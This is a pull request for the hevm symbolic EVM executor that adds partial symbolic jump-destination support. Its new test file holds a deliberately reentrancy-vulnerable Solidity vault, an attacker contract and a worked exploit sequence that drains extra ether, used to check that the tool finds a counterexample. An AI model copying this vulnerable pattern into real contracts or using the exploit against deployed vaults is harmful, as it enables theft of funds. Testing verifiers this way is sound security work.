### PR TITLE
Adding partial symbolic jumpdest support and test for it

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -15,6 +15,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   and further solc-specific simplifications of Expr
 - Simplify earlier and don't check reachability for things statically determined to be FALSE
 - New concrete fuzzer that can be controlled via `--num-cex-fuzz`
+- Partial support for dynamic jumps when the jump destination can be computed
+  given already available information
 
 ## [0.52.0] - 2023-10-26
 

--- a/flake.lock
+++ b/flake.lock
@@ -82,6 +82,22 @@
         "type": "github"
       }
     },
+    "forge-std": {
+      "flake": false,
+      "locked": {
+        "lastModified": 1702656582,
+        "narHash": "sha256-qDC/3x/CfeghsqftBJme4IlNGDG7YgV9cx8I5tc30KA=",
+        "owner": "foundry-rs",
+        "repo": "forge-std",
+        "rev": "155d547c449afa8715f538d69454b83944117811",
+        "type": "github"
+      },
+      "original": {
+        "owner": "foundry-rs",
+        "repo": "forge-std",
+        "type": "github"
+      }
+    },
     "foundry": {
       "inputs": {
         "flake-utils": "flake-utils_2",
@@ -138,6 +154,7 @@
         "ethereum-tests": "ethereum-tests",
         "flake-compat": "flake-compat",
         "flake-utils": "flake-utils",
+        "forge-std": "forge-std",
         "foundry": "foundry",
         "nixpkgs": "nixpkgs_2",
         "solidity": "solidity"

--- a/flake.nix
+++ b/flake.nix
@@ -21,9 +21,13 @@
       url = "github:haskell/cabal";
       flake = false;
     };
+    forge-std = {
+      url = "github:foundry-rs/forge-std";
+      flake = false;
+    };
   };
 
-  outputs = { self, nixpkgs, flake-utils, solidity, ethereum-tests, foundry, cabal-head, ... }:
+  outputs = { self, nixpkgs, flake-utils, solidity, forge-std, ethereum-tests, foundry, cabal-head, ... }:
     flake-utils.lib.eachDefaultSystem (system:
       let
         pkgs = (import nixpkgs { inherit system; config = { allowBroken = true; }; });
@@ -110,6 +114,7 @@
           ]).overrideAttrs(final: prev: {
             HEVM_SOLIDITY_REPO = solidity;
             HEVM_ETHEREUM_TESTS_REPO = ethereum-tests;
+            HEVM_FORGE_STD_REPO = forge-std;
             DAPP_SOLC = "${pkgs.solc}/bin/solc";
           });
 
@@ -203,6 +208,7 @@
             HEVM_SOLIDITY_REPO = solidity;
             DAPP_SOLC = "${pkgs.solc}/bin/solc";
             HEVM_ETHEREUM_TESTS_REPO = ethereum-tests;
+            HEVM_FORGE_STD_REPO = forge-std;
 
             # NOTE: hacks for bugged cabal new-repl
             LD_LIBRARY_PATH = libraryPath;

--- a/src/EVM/Solidity.hs
+++ b/src/EVM/Solidity.hs
@@ -299,7 +299,7 @@ readBuildOutput root CombinedJSON = do
     [x] -> readSolc CombinedJSON root (outDir </> x)
     [] -> pure . Left $ "no json files found in: " <> outDir
     _ -> pure . Left $ "multiple json files found in: " <> outDir
-readBuildOutput root Foundry = do
+readBuildOutput root _ = do
   let outDir = root </> "out"
   jsons <- findJsonFiles outDir
   case (filterMetadata jsons) of
@@ -400,7 +400,7 @@ force s = fromMaybe (internalError s)
 readJSON :: ProjectType -> Text -> Text -> Maybe (Contracts, Asts, Sources)
 readJSON DappTools _ json = readStdJSON json
 readJSON CombinedJSON _ json = readCombinedJSON json
-readJSON Foundry contractName json = readFoundryJSON contractName json
+readJSON _ contractName json = readFoundryJSON contractName json
 
 -- | Reads a foundry json output
 readFoundryJSON :: Text -> Text -> Maybe (Contracts, Asts, Sources)

--- a/src/EVM/Solidity.hs
+++ b/src/EVM/Solidity.hs
@@ -185,7 +185,7 @@ instance Monoid BuildOutput where
   mempty = BuildOutput mempty mempty
 
 -- | The various project types understood by hevm
-data ProjectType = DappTools | CombinedJSON | Foundry
+data ProjectType = DappTools | CombinedJSON | Foundry | FoundryStdLib
   deriving (Eq, Show, Read, ParseField)
 
 data SourceCache = SourceCache

--- a/test/contracts/fail/10_BadVault.sol
+++ b/test/contracts/fail/10_BadVault.sol
@@ -1,0 +1,204 @@
+// SPDX-License-Identifier: MIT
+// contributed by @karmacoma on 5 Aug 2023
+
+pragma solidity ^0.8.15;
+
+import "forge-std/Test.sol";
+import {console2} from "forge-std/console2.sol";
+// import {console2} from "ds-test/console2.sol";
+
+// inspired by the classic reentrancy level in Ethernaut CTF
+contract BadVault {
+    mapping(address => uint256) public balance;
+
+    function deposit() external payable {
+        balance[msg.sender] += msg.value;
+
+        // console2.log("deposit", msg.sender, msg.value);
+    }
+
+    function withdraw(uint256 amount) external {
+        // checks
+        uint256 _balance = balance[msg.sender];
+        require(_balance >= amount, "insufficient balance");
+
+        // console2.log("withdraw", msg.sender, amount);
+
+        // interactions
+        (bool success,) = msg.sender.call{value: amount}("");
+        require(success, "transfer failed");
+
+        // effects
+        balance[msg.sender] = _balance - amount;
+    }
+}
+
+// from https://github.com/mds1/multicall
+struct Call3Value {
+    address target;
+    uint256 value;
+    bytes data;
+}
+
+contract ExploitLaunchPad {
+    address public owner;
+    bool reentered;
+
+    Call3Value public call;
+
+    constructor() {
+        owner = msg.sender;
+    }
+
+    receive() external payable {
+        if (reentered) {
+            return;
+        }
+
+        require(call.value <= address(this).balance, "insufficient balance");
+
+        reentered = true;
+        (bool success,) = call.target.call{value: call.value}(call.data);
+        reentered = false;
+    }
+
+    function defer(Call3Value calldata _call) external payable {
+        require(msg.sender == owner, "only owner");
+        call = _call;
+    }
+
+    function go(Call3Value calldata _call)
+        external
+        payable
+    {
+        require(msg.sender == owner, "only owner");
+        require(_call.value <= address(this).balance, "insufficient balance");
+
+        (bool success,) = _call.target.call{value: _call.value}(_call.data);
+    }
+
+    function deposit() external payable {}
+
+    function withdraw() external {
+        owner.call{value: address(this).balance}("");
+    }
+}
+
+contract BadVaultTest is Test {
+    BadVault vault;
+    ExploitLaunchPad exploit;
+
+    address user1;
+    address user2;
+    address attacker;
+
+    function setUp() public {
+        vault = new BadVault();
+
+        user1 = address(1);
+        user2 = address(2);
+
+        vm.deal(user1, 1 ether);
+        vm.prank(user1);
+        vault.deposit{value: 1 ether}();
+
+        vm.deal(user2, 1 ether);
+        vm.prank(user2);
+        vault.deposit{value: 1 ether}();
+
+        attacker = address(42);
+        vm.prank(attacker);
+        exploit = new ExploitLaunchPad();
+
+        assert(exploit.owner() == attacker);
+    }
+
+    /// @custom:halmos --array-lengths data1=36,data2=36,deferredData=36
+    function prove_BadVault_usingExploitLaunchPad(
+        address target1,
+        uint256 amount1,
+        bytes memory data1,
+
+        address target2,
+        uint256 amount2,
+        bytes memory data2,
+
+        address deferredTarget,
+        uint256 deferredAmount,
+        bytes memory deferredData
+
+    ) public {
+        uint256 STARTING_BALANCE = 2 ether;
+        vm.deal(attacker, STARTING_BALANCE);
+
+        vm.assume(address(exploit).balance == 0);
+        vm.assume((amount1 + amount2) <= STARTING_BALANCE);
+
+        // console2.log("attacker starting balance", address(attacker).balance);
+        vm.prank(attacker);
+        exploit.deposit{value: STARTING_BALANCE}();
+
+        vm.prank(attacker);
+        exploit.go(Call3Value({
+            target: target1,
+            value: amount1,
+            data: data1
+        }));
+
+        vm.prank(attacker);
+        exploit.defer(Call3Value({
+            target: deferredTarget,
+            value: deferredAmount,
+            data: deferredData
+        }));
+
+        vm.prank(attacker);
+        exploit.go(Call3Value({
+            target: target2,
+            value: amount2,
+            data: data2
+        }));
+
+        vm.prank(attacker);
+        exploit.withdraw();
+
+        // they can not end up with more ether than they started with
+        // console2.log("attacker final balance", address(attacker).balance);
+        assert(attacker.balance <= STARTING_BALANCE);
+    }
+
+    // running `forge test --match-test test_BadVault_solution -vvv` confirms the attack trace:                                                                                                                                                                            took 6s Node system at 18:00:43
+    //   deposit 0x0000000000000000000000000000000000000001 1000000000000000000
+    //   deposit 0x0000000000000000000000000000000000000002 1000000000000000000
+    //   attacker starting balance 2000000000000000000
+    //   deposit 0x5f4E4CcFF0A2553b2BDE30e1fC8531B287db9087 1000000000000000000
+    //   withdraw 0x5f4E4CcFF0A2553b2BDE30e1fC8531B287db9087 1000000000000000000
+    //   withdraw 0x5f4E4CcFF0A2553b2BDE30e1fC8531B287db9087 1000000000000000000
+    //   attacker final balance 3000000000000000000
+    function test_BadVault_solution() public {
+        prove_BadVault_usingExploitLaunchPad(
+            // 1st call
+            address(vault),
+            1 ether,
+            abi.encodeWithSelector(
+                vault.deposit.selector
+            ),
+
+            // 2nd call
+            address(vault),
+            0 ether,
+            abi.encodeWithSelector(
+                vault.withdraw.selector,
+                1 ether
+            ),
+
+            // deferred call
+            address(vault),
+            0 ether,
+            abi.encodeWithSelector(
+                vault.withdraw.selector,
+                1 ether
+            )
+        );
+    }
+}

--- a/test/test.hs
+++ b/test/test.hs
@@ -1109,6 +1109,9 @@ tests = testGroup "hevm"
     , test "transfer-dapp" $ do
         let testFile = "test/contracts/pass/transfer.sol"
         runSolidityTest testFile "prove_transfer" >>= assertEqualM "should prove transfer" True
+    , test "badvault-sym-branch" $ do
+        let testFile = "test/contracts/fail/10_BadVault.sol"
+        runSolidityTestCustom testFile "prove_BadVault_usingExploitLaunchPad"  Nothing Nothing True Nothing FoundryStdLib >>= assertEqualM "Must find counterexample" False
     , test "Prove-Tests-Fail" $ do
         let testFile = "test/contracts/fail/dsProveFail.sol"
         runSolidityTest testFile "prove_trivial" >>= assertEqualM "test result" False


### PR DESCRIPTION
## Description
This allows us to do partial symbolic jumpdest support. In particular, when the jumpdest can be computed with already-existing data this works. The added test file fails with `Exception: cannot handle symbolic branch conditions in this interpreter: IsZero (GT (...` but with the change of adding a stronger form of `Expr.simplify` (`concKeccakSimpExpr`), we can compute the jump and continue exploring.

This change does not fully make the test work, as we still bail out for another reason. However, it significantly improves our capabilities, and should help in our test suite.

## More detailed description of the fix

In file `src/EVM/Stepper.hs` on lines 121... is the real change. What this does is that instead of checking if the jump address is a `(Lit a)`, it first puts the jump address into a variable `expr`, and calls `concKeccakSimpExpr expr` on it. THEN it checks whether this is a `(Lit a)`. Hence, expressions that can be simplified into a `Lit` will now work. 

Let me give an example: (1) Previously, if the jump address was `Lit 5`, the jump succeeded, and we continued our marry way. However, when it was `Add (Lit 1) (Lit4)`, it would abort, saying that it cannot jump to a symbolic address. Now, (2) what will happen is that `(Lit 5)` will still work, as `concKeccakSimpExpr (Lit 5) = Lit 5`. However, `Add (Lit 1) (Lit4)` will also work now, since `concKeccakSimpExpr (Add (Lit 1) (Lit4)) = Lit 5`, and hence we can continue exploring.

## Checklist

- [x] tested locally
- [x] added automated tests
- [ ] updated the docs
- [x] updated the changelog


## Minor detail

The added test used to fail because of

`
hevm: cannot handle symbolic branch conditions in this interpreter: IsZero (GT (SLoad (Keccak (CopySlice (Lit 0x0) (Lit 0x0) (Lit 0x40) (WriteWord (Lit 0x0) (Lit 0x2) (ConcreteBuf "\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\STX\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL")) (ConcreteBuf ""))) (SStore (Keccak (ConcreteBuf "\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\SOH\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL")) (Lit 0xde0b6b3a7640000) (ConcreteStore (fromList [])))) (Add (Lit 0xde0b6b3a7640000) (SLoad (Keccak (CopySlice (Lit 0x0) (Lit 0x0) (Lit 0x40) (WriteWord (Lit 0x0) (Lit 0x2) (ConcreteBuf "\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\STX\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL")) (ConcreteBuf ""))) (SStore (Keccak (ConcreteBuf "\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\SOH\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL\NUL")) (Lit 0xde0b6b3a7640000) (ConcreteStore (fromList []))))))
`

That expression can be simplified to a `Lit a`.